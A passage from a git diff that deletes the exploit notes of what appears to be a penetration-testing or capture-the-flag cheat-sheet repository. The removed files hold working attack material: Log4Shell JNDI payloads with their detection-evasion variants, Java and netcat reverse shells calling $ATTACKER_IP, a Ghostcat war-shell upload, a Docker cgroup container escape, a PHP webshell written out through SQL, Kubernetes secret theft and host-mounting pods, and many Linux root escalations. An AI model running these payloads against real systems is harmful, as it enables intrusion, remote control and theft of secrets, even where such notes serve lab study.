-u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
-
-resp = requests.get(u, headers={
-    'Host': '54.202.82.13'
-})
-```
diff --git a/exploit/imagemagick/imagetragick.md b/exploit/imagemagick/imagetragick.md
deleted file mode 100644
index 0d80eb1..0000000
--- a/exploit/imagemagick/imagetragick.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# ImageTragick
-
-* [ImageTragick Website](https://imagetragick.com)
diff --git a/exploit/java/JNDI-Exploit-Kit b/exploit/java/JNDI-Exploit-Kit
deleted file mode 160000
index e464fac..0000000
--- a/exploit/java/JNDI-Exploit-Kit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit e464facbc761a1b3530181a6f37c95925c197551
diff --git a/exploit/java/OGNL/cve_2022_26134.md b/exploit/java/OGNL/cve_2022_26134.md
deleted file mode 100644
index cf2e7f6..0000000
--- a/exploit/java/OGNL/cve_2022_26134.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# CVE-2022-26134
-
-* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
-* Confluence versions:
-    * 1.3.0 to 7.4.17
-    * 7.13.0 to 7.13.7
-    * 7.14.0 to 7.14.3 
-    * 7.15.0 to 7.15.2 
-    * 7.16.0 to 7.16.4
-    * 7.17.0 to 7.17.4
-    * 7.18.0 to 7.18.1 
-* Object Graph Navigation Language (OGNL)
-
-## Usage
-
-* Payload is a GET request which is set via the URI
-```sh
- ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
-```
-* URL encode and curl for PoC
-
-* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)
-
diff --git a/exploit/java/ghidra_debug.md b/exploit/java/ghidra_debug.md
deleted file mode 100644
index c688d64..0000000
--- a/exploit/java/ghidra_debug.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Ghidra Debug RCE
-
-* If debug mode is enabled, connect to it via `jdb`
-```sh
-jdb -attach $TARGET_IP:$TARGET_PORT
-```
-```sh
-classpath
-classes
-```
-* Stop the service
-```sh
-stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
-```
-* Wait until the breakpoint hits and start a reverse shell
-```sh
-print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
-```
-
diff --git a/exploit/java/ghostcat.md b/exploit/java/ghostcat.md
deleted file mode 100644
index 4ab8094..0000000
--- a/exploit/java/ghostcat.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Ghostcat
-
-* CVE-2020-1938
-* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
-* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
-* upload the file via
-```sh
-curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
-``` 
-* Visit the webshell at `$TARGET_IP:8080/shello/`
-* Alternatively use a war reverse shell via
-```sh
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
-```
diff --git a/exploit/java/log4j-scan b/exploit/java/log4j-scan
deleted file mode 160000
index ceae24f..0000000
--- a/exploit/java/log4j-scan
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c
diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md
deleted file mode 100644
index 9768e5e..0000000
--- a/exploit/java/log4shell.md
+++ /dev/null
@@ -1,133 +0,0 @@
-# Log4Shell
-
-* `log4j` < version 2.15.0rc2
-* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java)
-* [log4j vulnerability tester](https://log4shell.huntress.com/)
-* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface)
-
-* Code inside a `param` value is parsed and a `${payload}` will be executed, for example
-```sh
-${sys:os.name}
-${sys:user.name}
-${log4j:configParentLocation}
-${ENV:PATH}
-${ENV:HOSTNAME}
-${java:version}
-```
-## Java Naming and Directory Interface JNDI
-
-* Vulnerability can be exploited via `${jndi:ldap://<attacker-IP>/foo}`
-
-## POC
-```sh
-curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
-```
-* Use HTTP header field as storage for payload or any other possible input field
-```HTTP
-X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
-Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
-X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
-```
-
-## Usage
-
-* Fuzz endpoints to applicate the exploit on
-* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
-* Java version should be the same as the one on the target
-* A Proxy LDAP server to an HTTP server is needed
-
-* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
-```java
-public class Exploit {
-    static {
-        try {
-            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
-        } catch (Exception e) {
-            e.printStackTrace();
-        }
-    }
-}
-```
-or another one 
-```java 
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.Socket;
-
-public class Exploit {
-    static {
-        String host = "$ATTACKER_IP";
-        int port = 4711;
-        String cmd = "/bin/sh";
-        try {
-            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
-            Socket s = new Socket(host, port);
-            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
-            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
-            while (!s.isClosed()) {
-                while (pi.available() > 0)
-                    so.write(pi.read());
-                while (pe.available() > 0)
-                    so.write(pe.read());
-                while (si.available() > 0)
-                    po.write(si.read());
-                so.flush();
-                po.flush();
-                Thread.sleep(50);
-                try {
-                    p.exitValue();
-                    break;
-                } catch (Exception e) {
-                }
-            }
-            p.destroy();
-            s.close();
-        } catch (Exception e) {
-        }
-    }
-}
-```
-
-* Run the LDAP, HTTP and reverse shell
-```sh
-java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
-```
-```sh
-php -S 0.0.0.0:8000
-```
-```sh
-nc -lvnp 4449
-```
-
-* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
-
-## Detection
-
-* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git)
-* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228)
-* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/)
-* [Yara rules](https://github.com/darkarnium/CVE-2021-44228)
-
-* Parse logs for `jndi`
-
-## Obfuscation 
-
-* Possible bypasses are as follows
-```sh
-${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
-${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
-${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
-${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
-${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
-${${::-j}ndi:rmi://attackerendpoint.com/}
-```
-
-## Mitgation
-
-* [Apache Solr security news](https://solr.apache.org/security.html)
-* Add the following line to `solr.in.sh`
-```toml
-SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
-10.10.90.21210.10.90.212
-```
diff --git a/exploit/java/spring4shell.md b/exploit/java/spring4shell.md
deleted file mode 100644
index bf47dd9..0000000
--- a/exploit/java/spring4shell.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# CVE-2022-22965
-
-* [Mitre CVE details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-22965)
-* Follow up to CVE-2010-1622 by circumventing the patch for the vulnerability
-* RCE of `*.jsp` files through tomcat HTTP post request
-
-* Conditions
-    * > jdk9
-    * Spring framework < 5.2, 5.2.0-19, 5.3.0-17
-    * Apache tomcat
-    * spring as WAR package
-    * `spring-webvmc` or `spring-webflux` components of the spring framework
-
-
diff --git a/exploit/level3_hypervisor/docker_sec/dive b/exploit/level3_hypervisor/docker_sec/dive
deleted file mode 160000
index c7d121b..0000000
--- a/exploit/level3_hypervisor/docker_sec/dive
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6
diff --git a/exploit/level3_hypervisor/docker_sec/docker.md b/exploit/level3_hypervisor/docker_sec/docker.md
deleted file mode 100644
index d2d05c5..0000000
--- a/exploit/level3_hypervisor/docker_sec/docker.md
+++ /dev/null
@@ -1,185 +0,0 @@
-# Docker Vulnerabilities
-
-* [Container enumeration](https://github.com/stealthcopter/deepce)
-
-## Abusing Registry
-* [Registry Doc](https://docs.docker.com/registry/spec/api/)
-* Registry is a json API endpoint
-* Private registry added in `/etc/docker/daemon.json`
-* Can be found by nmap as a service
-
-### Enumeration
-* General query
-```sh
-curl http://test.com:5000/v2/_catalog`
-```
-* List tags
-```sh
-curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
-```
-* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
-```sh
-curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
-```
-
-## Reversing Docker Images
-* [Dive](https://github.com/wagoodman/dive)
-```sh
-dive <IMAGE-ID>
-```
-
-## Uploading Images to Registry
-* Ever image has a `latest` tag
-* Upload modified docker image as `latest`
-* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
-
-## RCE via Exposed Docker Daemon
-* Users inside the `docker` group may open tcp socket through docker
-* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
-* Confirming via `curl http://test.com:2375/version` on open docker port
-* Execute commands on socket
-    ```sh 
-    docker -H tcp://test.com:2375 ps
-    docker -H tcp://test.com:2375 exec <container> <cmd>
-    docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
-    ```
-
-* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
-
-## Escape Container via Exposed Docker Daemon
-* Looking for exposed docker sockets
-```sh
-find / -name "*sock"
-groups
-```
-
-* Mount the host volume and chroot to it, need alpine image. 
-```sh
-docker images
-docker run -v /:/mnt --rm -it alpine chroot /mnt sh
-```
-or
-```sh
-docker run -v /:/host --rm -it <imageID> chroot /host/ bash
-```
-
-## Shared Namespaces
-* Namespaces
-* Cgroups
-* OverlayFS
-
-* Requires root inside the container
-
-* Execute command
-```sh
-nsenter --target 1 --mount sh
-```
-
-## Misconfiguration
-* Privileged container connect to the host directly, not through the docker engine
-* Execution of bins on the host from libs inside the container is possible
-```sh
-capsh --print
-```
-* `man capabilities`
-
-* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
-
-* Exploit and get a reverse shell to the host via
-```sh
-mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
-echo 1 > /tmp/cgrp/x/notify_on_release
-host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
-echo "$host_path/exploit" > /tmp/cgrp/release_agent
-echo '#!/bin/sh' > /exploit
-echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4711 >/tmp/f" >> /exploit
-chmod a+x /exploit
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-```
-* The file may appear outside the container on the host system
-## Check fdisk
-
-* `fdisk -l` and `lsblk`, host bulk device may be exposed
-* Mount the device
-```sh
-mkdir /mnt/hostdev
-mount /dev/<hostVda> /mnt/hostdev
-```
-* Check `/dev` as well !!! and mount device
-
-## Creating a Container from inside another container
-
-* Needs root inside a container
-* Upload [static curl](https://github.com/moparisthebest/static-curl)
-* Check available images and containers
-```sh
-curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
-curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
-```
-* Inside the container as root
-```sh
-curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
-```
-* Return value is the ID
-* Start a container
-```sh
-curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
-```
-* Login in to the host via ssh remotely or socat locally
-```sh
-socat - UNIX-CONNECT:/var/run/docker.sock
-POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
-Host:
-Connection: Upgrade
-Upgrade: tcp
-
-HTTP/1.1 101 UPGRADED
-Content-Type: application/vnd.docker.raw-stream
-Connection: Upgrade
-Upgrade: tcp
-```
-
-## Escape through DB
-
-* Login into DB
-* Create table
-* Inject PHP code
-* Select table content intoa file the user can read
-* Execute the file
-```sql
-create table h4x0r (pwn varchar(1024));
-insert into h4x0r (pwn) values ('<?php $cmd=$_GET[“cmd”];system($cmd);?>');
-select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
-```
-* curl the webshell hon the exploited host
-```sh
-curl <host-IP>/shell.php?cmd=id
-```
-
-## Dirty c0w
-https://github.com/dirtycow/dirtycow.github.io
-
-## runC
-[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
-
-## Securing a Container
-* Least Privileges
-* Seccomp
-* Securing Registry via TLS
-
-## Checking if you are inside a container
-* Low process count
-```sh
-ps aux
-```
-
-* `.dockerenv` in `/`
-```sh
-cd / && ls -lah
-```
-
-* cgroups contain docker names
-```sh
-pwd /proc/1
-cat cgroups
-```
diff --git a/exploit/level3_hypervisor/kubeletctl b/exploit/level3_hypervisor/kubeletctl
deleted file mode 160000
index 63a7ba9..0000000
--- a/exploit/level3_hypervisor/kubeletctl
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20
diff --git a/exploit/level3_hypervisor/kubernetes.md b/exploit/level3_hypervisor/kubernetes.md
deleted file mode 100644
index e57bc07..0000000
--- a/exploit/level3_hypervisor/kubernetes.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# Kubernetes
-
-* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well
-
-## Account Token
-* Snatch an account token from inside a pod
-* Use it via kubectl, watch out for authorizations and namespaces
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 auth can-i --list
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get namespaces
-```
-* Save secrets from namespaces as yaml file
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets -n kube-system
-```
-* Specify secret
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml
-```
-
-## Privilege Escalation 
-* [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
-* Show images via
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pods
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get pod  <image> -o yaml
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 get nodes -o yaml
-```
-* Use a found image to create the following yaml file
-```yaml
-apiVersion: v1
-kind: Pod
-metadata:
-  name: attacking-pod
-spec:
-  containers:
-  - image: <image name in found containers/nodes section> 
-    name: <name of image in found containers/nodes section>
-    command: [ "/bin/sh", "-c", "--" ]
-    args: [ "while true; do sleep 30; done;" ]
-    volumeMounts:
-    - mountPath: /host
-      name: host
-  volumes:
-  - name: host
-    hostPath:
-      path: /
-      type: Directory
-```
-* `/` of the node is mounted to `/host` inside the new pod
-* Create the pod via
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 apply -f <filename.yaml>
-```
-* Run an interactive session on the pod
-```sh
-kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify  --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
-```
diff --git a/exploit/level3_hypervisor/lxc.md b/exploit/level3_hypervisor/lxc.md
deleted file mode 100644
index c3edf01..0000000
--- a/exploit/level3_hypervisor/lxc.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# LXC 
-
-## Privilege Escalation
-
-### Member of lxd Group
-
-* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
-* User has to be in `lxd` group, not necessarily `sudo`.
-
-#### Usage
-* Clone and build 
-```sh
-git clone https://github.com/saghul/lxd-alpine-builder.git
-cd lxd-alpine-builde && sudo && ./build alpine
-```
-* Upload to target
-* Import alpine image
-```sh
-lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
-```
-* Prepare image
-```sh
-lxc image list
-lxc init myimage ignite -c security.privileged=true
-lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
-lxc start ignite
-lxc exec ignite /bin/sh
-```
-* Host `/` is mounted at `/mnt/root` inside the container
-* `root` directory is at `/mnt/root/root`
-
-
diff --git a/exploit/level3_hypervisor/microk8s.md b/exploit/level3_hypervisor/microk8s.md
deleted file mode 100644
index f2bebac..0000000
--- a/exploit/level3_hypervisor/microk8s.md
+++ /dev/null
@@ -1,39 +0,0 @@
-# MicroK8s 
-
-
-## Usage 
-
-* Create `pod.yaml` configuration
-```yaml
-apiVersion: v1
-kind: Pod
-metadata:
-  name: harry-podder
-spec:
-  containers:
-  - name: shell
-    image: localhost:47111/alpine
-    command:
-      - "/bin/bash"
-      - "-c"
-      - "sleep 10000"
-    volumeMounts:
-      - name: root
-        mountPath: /mnt/root
-  volumes:
-  - name: root
-    hostPath:
-      path: /
-      type: Directory
-```
-
-* Deploy the pod
-```sh
-microk8s kubectl apply -f pod.yaml
-```
-* Run the Pod
-```sh
-microk8s kubectl exec -it harry-podder -- /bin/bash
-```
-
-
diff --git a/exploit/linux/capabilities.md b/exploit/linux/capabilities.md
deleted file mode 100644
index 2a393a4..0000000
--- a/exploit/linux/capabilities.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Capabilities
-
-* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
-
-## Usage
-* Find capabilities
-```sh
-getcap -r  / 2>/dev/null
-```
-
-* `cap_setuid` through `/bin/perl`
-```sh
-perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
-```
diff --git a/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit b/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
deleted file mode 160000
index e1fd1f6..0000000
--- a/exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330
diff --git a/exploit/linux/dirty_pipe/dirty_pipe.md b/exploit/linux/dirty_pipe/dirty_pipe.md
deleted file mode 100644
index 16e4ed9..0000000
--- a/exploit/linux/dirty_pipe/dirty_pipe.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# CVE-2022-0847
-
-* [Max Kellerman's post](https://dirtypipe.cm4all.com/)
-
-* 5.8 < Vulnerable kernels < 5.10.102
-* If a file can be read, it can be written also.
-
-## Usage
-
-* `splice(2)` moves data between files and through pipes without copying between kernel and user adress space
-* Anonymous pipes permissions are not checked
-    * Read only permissions on pages do not matter on a pipe level
-* Splice is putting data into the pipe and malicious data afterwards in the same one to overwrite the mem page
-* `PIPE_BUF_FLAG_CAN_MERGE` flag has to be activated in order to write back to a file
-* Works as long as there is an offset to start of a page in the beginning of the writing
diff --git a/exploit/linux/exiftool.md b/exploit/linux/exiftool.md
deleted file mode 100644
index ab274bf..0000000
--- a/exploit/linux/exiftool.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# CVE-2021-22204
-
-* Craft an a payload and execute it via exiftool
-* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
-
-## Usage
-* Payload is `(metadata "\c${system('id')};")`
-```sh
-sudo apt install djvulibre-bin
-bzz payload payload.bzz
-djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
-```
diff --git a/exploit/linux/groups.md b/exploit/linux/groups.md
deleted file mode 100644
index 2de2950..0000000
--- a/exploit/linux/groups.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# Groups
-
-* [steflan-security](https://steflan-security.com/linux-privilege-escalation-exploiting-user-groups/)
diff --git a/exploit/linux/ld_preload.md b/exploit/linux/ld_preload.md
deleted file mode 100644
index 4e99b97..0000000
--- a/exploit/linux/ld_preload.md
+++ /dev/null
@@ -1,56 +0,0 @@
-# LD_PRELOAD
-
-* Preload libs and do interpositioning of functions.
-
-*  `man ld.so`
-*  `man dlsym`, `dlsym()` calls the original function
-
-## Example 1
-* Interpositioning of `_init()`
-```sh
-#include <stdio.h>
-#include <sys/types.h>
-#include <stdlib.h>
-
-void _init() {
-    unsetenv("LD_PRELOAD");
-    setgid(0);
-    setuid(0);
-    system("/bin/bash");
-}
-```
-* `gcc -fPIC -shared -o lib.so lib.c -nostartfiles`
-* `sudo LD_PRELOAD=lib.so apache2`
-* `$ id`
-
-
-## Example 2
-* Interpositioning of `write()`
-```C
-#include <stdio.h>
-#include <unistd.h>
-#include <dlfcn.h> // Contains _GNU_SOURCE from man dlsym
-#include <string.h>
-ssize_t write(int fildes, const void *buf, size_t nbytes)
-{
-    ssize_t result;
-    do the thing;
-    return result;
-}
-```
-* In case the symbol lookup returns an error libdl is linked
-```sh
-gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl` 
-```
-## Preloading
-* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows
-* `LD_PRELOAD=./interpositioning.so <binary>`
-or
-* `export LD_PRELOAD=$(pwd)/interpositioning.so`
-or
-* Global preload via `/etc/ld.so.preload`
-or
-* Change the preload path via `LD_PRELOAD_PATH`
-
-* Verify via `ldd <somebinary>`
-
diff --git a/exploit/linux/nfs_rootsquash.md b/exploit/linux/nfs_rootsquash.md
deleted file mode 100644
index 87b8b01..0000000
--- a/exploit/linux/nfs_rootsquash.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# NFS RootSquash
-
-* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
-* `no_root_squash` has to be as an option on the NFS device
-
-## Usage
-* `showmount -e <target-IP>`
-* `mkdir /tmp/net_volume`
-
-* Connect to NFS share
-```sh
-mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
-```
-
-* Create root shell inside the dir of the share
-```sh
-echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
-gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
-chmod +s /tmp/net_volume/shell
-```
-
diff --git a/exploit/linux/overlayfs.md b/exploit/linux/overlayfs.md
deleted file mode 100644
index 826695f..0000000
--- a/exploit/linux/overlayfs.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# CVE-2021-3493
-
-* Kernel module, enables aggregation of mountpoints in a single tree of which parts are writeable others are not
-* [Exploit](https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/)
-
-
diff --git a/exploit/linux/pkexec/CVE_2021_4034.md b/exploit/linux/pkexec/CVE_2021_4034.md
deleted file mode 100644
index 17777f4..0000000
--- a/exploit/linux/pkexec/CVE_2021_4034.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# CVE-2021-4032
-
-* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
-* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034)
-
-* Arg counting starts at 1 inside pkexec logic
-* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1]
-* The value behind NULL can be overwritten, which is the first env param
-
-
-
diff --git a/exploit/linux/polkit.md b/exploit/linux/polkit.md
deleted file mode 100644
index eca25ba..0000000
--- a/exploit/linux/polkit.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# CVE-2021-3560
-
-* Exploit `< 0.105-26ubuntu1.1`
-
-
-## Racing Condition
-* Request creation of account via dbus message and `pkexec`. sleep time is variable.
-```sh
-dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
-```
-    * Create password via `openssl passwd -6 -salt salt password123`
-```sh
-dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
-```
-* Request is killed after polkits receives it
-
-* Polkit requests uid of user who sent the message, which has been deleted
-* Error will be thrown
-* Uid turns to root afterwards
-* Request succeeds
-
-* `su user1` and `sudo -s`
-
-
-# Priv Esc with Two Sessions
-* User has to be member of group `sudo`
-* Open two ssh sessions
-* In session one check the PID
-```sh
-echo $$
-```
-* In the other session
-```sh
-pkttyagent --process <PID of s1>
-```
-* In session one do
-```sh
-pkexec "/bin/bash"
-``` 
-* Enter password in session two
diff --git a/exploit/linux/racing_conditions.md b/exploit/linux/racing_conditions.md
deleted file mode 100644
index 254c626..0000000
--- a/exploit/linux/racing_conditions.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Racing Conditions
-
-## Read files from another user
-
-* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
-* The file of intereset is called `root_credentials` and is owned by root
-* Create a file 
-```sh
-touch yo
-```
-* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
-```sh
-gcc gistfile.c -o rename_file
-```
-* Inside session 1 start the binary
-```sh
-./rename_file yo root_credentials
-```
-* Inside session to try to read `root_credentials` until it succeeds
-```sh
-./read_creds root_credentials
-```
diff --git a/exploit/linux/setcap.md b/exploit/linux/setcap.md
deleted file mode 100644
index 625270c..0000000
--- a/exploit/linux/setcap.md
+++ /dev/null
@@ -1,13 +0,0 @@
-# setcap
-
-* Set capabilities of a binary
-* [Hacktrick's setuid page](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/euid-ruid-suid)
-
-
-## Usage
-
-* If there is an S-bit or sudo on setcap do the following. Copy python binary and
-```sh
-setcap cap_setuid+ep /absolute/path/to/copied/python3 
-python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
-```
diff --git a/exploit/linux/shared_object_injection.md b/exploit/linux/shared_object_injection.md
deleted file mode 100644
index 76f39ef..0000000
--- a/exploit/linux/shared_object_injection.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Shared Object Injection
-
-* [gaffe23](https://github.com/gaffe23/linux-inject)
-* [exploit-db](https://www.exploit-db.com/papers/37606)
-
-* Test binary via 
-```sh
-strace <binary> 2>&1 | grep -i -E "open|access|no such file"
-```
-
-## Example
-
-```sh
-#include <stdio.h>
-#include <stdlib.h>
-
-static void inject ( ) __attribute__ ( (constructor) );
-
-void inject ( ) {
-    system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
-}
-```
-* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c`
-* Run binary using the lib
diff --git a/exploit/linux/shell_shock.md b/exploit/linux/shell_shock.md
deleted file mode 100644
index dfc0209..0000000
--- a/exploit/linux/shell_shock.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# Shell Shock
-
-* Check target via
-```sh
-curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://<target-IP>/cgi-bin/test/test.cgi
-```
diff --git a/exploit/linux/sudo/CVE_2019_14287.md b/exploit/linux/sudo/CVE_2019_14287.md
deleted file mode 100644
index 8c9a582..0000000
--- a/exploit/linux/sudo/CVE_2019_14287.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# CVE-2019-14287
-
-* Versions < 1.8.28
-
-## Usage 
-* Integer overflow with resulting root status.
-```sh
